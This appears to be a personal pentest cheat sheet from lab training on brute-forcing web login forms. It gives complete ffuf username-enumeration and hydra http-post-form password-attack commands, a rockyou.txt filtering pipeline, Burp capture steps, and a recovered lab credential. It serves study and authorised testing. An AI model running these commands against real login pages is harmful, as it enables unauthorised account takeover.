HYDRA

01.USER ENUMERATION

#manually verify whether the web login page will display an error stating that the user name is invalid
root@oco:~$ BROWSER > {targetSite:port}
 username: invalid
 password: invalid
 * error: "Unknown user"

#automate the process of enumerating usernames (every entry is a live login request against the target: check for rate limiting or account lockout first, and expect a run over a list this size to take a long time)
root@oco:~$ curl -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Usernames/xato-net-10-million-usernames.txt
root@oco:~$ ffuf -w xato-net-10-million-usernames.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user"
 * the -w represents the wordlist to use
 * the -u represents the target URL and page
 * the -X POST represents the HTTP method to use
 * the -H is used to add a custom header to the HTTP requests
    - the Content-Type application/x-www-form-urlencoded is often used when sending data in a form submission
 * the -d represents the data
 * the -fr is used to filter out results whose HTTP response matches a regular expression
    - If the string "Unknown user" appears in the HTTP response, those results will be excluded from the output; anything else (including rate-limit, error, or lockout pages) is shown as a hit, so confirm each candidate username manually (adding a size filter such as -fs helps cut down false positives)

#after identifying valid usernames, proceed by attempting to brute-force the user's password

02.IDENTIFY ERROR MESSAGE

root@oco:~$ BROWSER > {targetSite:port}
 username field: {arbitraryValue}
 password field: {arbitraryValue}
 * submit the form and record the error message the page returns
 
#identified incorrect credential message
 * unknown user
 * invalid credentials

03.IDENTIFY POST PARAMETERS

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 username field: {arbitraryValue}
 password field: {arbitraryValue}
 * submit the form so the request is captured by Burp's intercept
 

POST /index.php HTTP/1.1
Host: 83.136.254.158:51572
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=2j030ocgj9kbs0a18lai9m6dvg

username=test&password=test
 * identified post parameters as username=x&password=x

04.CRAFT CUSTOM PWLIST

#tailor the password list to the organization's password policy (if known)
 Minimum Length: 10 characters
 Must Include:
  At least one uppercase letter
  At least one lowercase letter
  At least one number
 
#filter rockyou.txt down to the entries that satisfy the policy above
root@oco:~$ cp /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt .
root@oco:~$ wc -l rockyou.txt
 * 14344391
root@oco:~$ grep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' | grep -E '.{10}' > customPWList.txt
 * rockyou.txt contains non-UTF-8 bytes; if GNU grep reports "binary file matches" instead of printing lines, add -a to each grep (or run the pipeline under LC_ALL=C) so the output file is not left empty
root@oco:~$ wc -l customPWList.txt
 * 151647

05.IMPLEMENTATION

root@oco:~$ hydra -L usernames.txt -P customPWList.txt IP -s PORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"
 * -L takes the usernames confirmed in step 01 (save the ffuf hits to a file) and -P the policy-filtered list from step 04; the path must be the one the form actually posts to (here /index.php per the Burp capture), and a condition with no F=/S= prefix is treated by hydra as a failure string
#analyze the form's structure & behavior to identify the parameter to use
root@htb:~$ BROWSER > {targetSite:Port} > Right-Click > View Page Source
 * ALT: curl -v {targetSite:Port}
 * ALT: Browser Dev Tools > Network Tab
    - find the request corresponding to the form submission and check the form data, headers, and the server’s response
 * ALT: Burp Suite
 
 * identified parameter info
    - The POST method means the credentials travel in the request body, so hydra's http-post-form module applies (http-get-form is the equivalent for forms that submit via the query string)
    - username and password

#provide invalid input to identify failure or success conditions
root@htb:~$ BROWSER > {targetSite:Port}
 username field: admin
 password field: password 

#construct the params string and condition string
root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/top-usernames-shortlist.txt
root@htb:~$ curl -s -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/2023-200_most_used_passwords.txt

root@htb:~$ hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 94.237.59.180 -s 55833 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials" -t 64
 * the -f option will stop hydra after the first successful login
 * the -s option is used to specify an alternative port
 * the -t option identifies the number of parallel threads to use; default 16 (a high value such as 64 is faster but more likely to trip rate limiting or account lockout, which then hides valid passwords; lower it if the target starts returning different responses)

 * [55833][http-post-form] host: 94.237.59.180   login: admin   password: zxcvbnm

#crafting the correct params string is crucial for a successful Hydra attack
  - Hydra's http-post-form service is specifically designed to target login forms. It automates POST requests, dynamically inserting username and password combinations into the request body. The module string is colon-separated (path:params:condition), so a literal colon inside the params must be escaped as \: ; if the captured request shows extra fields (e.g. a CSRF token) or the form only works with a session cookie, those must be supplied as well (H=Cookie: ... adds a header; hydra has no built-in way to fetch a per-request token), otherwise every attempt fails regardless of the password. Success and failure conditions are crucial for properly identifying valid and invalid login attempts.
     - the F= determines when a login attempt has failed
        - the failure condition checks for a specific string in the server's response
	   - e.g., 'Invalid credentials' (the message observed in step 02; use the exact text the target returns)
	      - hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid credentials"
     - the S= indicates when a login is successful
        - the success condition also checks for a specific string in the server's response
	   - e.g., '302 or dashboard or welcome'; a string that only appears in the authenticated response (such as a logout link) is more reliable than a status code, and any hit should still be verified by hand
	      - hydra ... http-post-form "/login:user=^USER^&pass=^PASS^:S=302"
	
#confirm the hit by logging in manually; hydra reports success whenever the failure string is absent, so this step rules out a false positive
root@oco:~$ BROWSER > {targetSite:port}
 admin:zxcvbnm
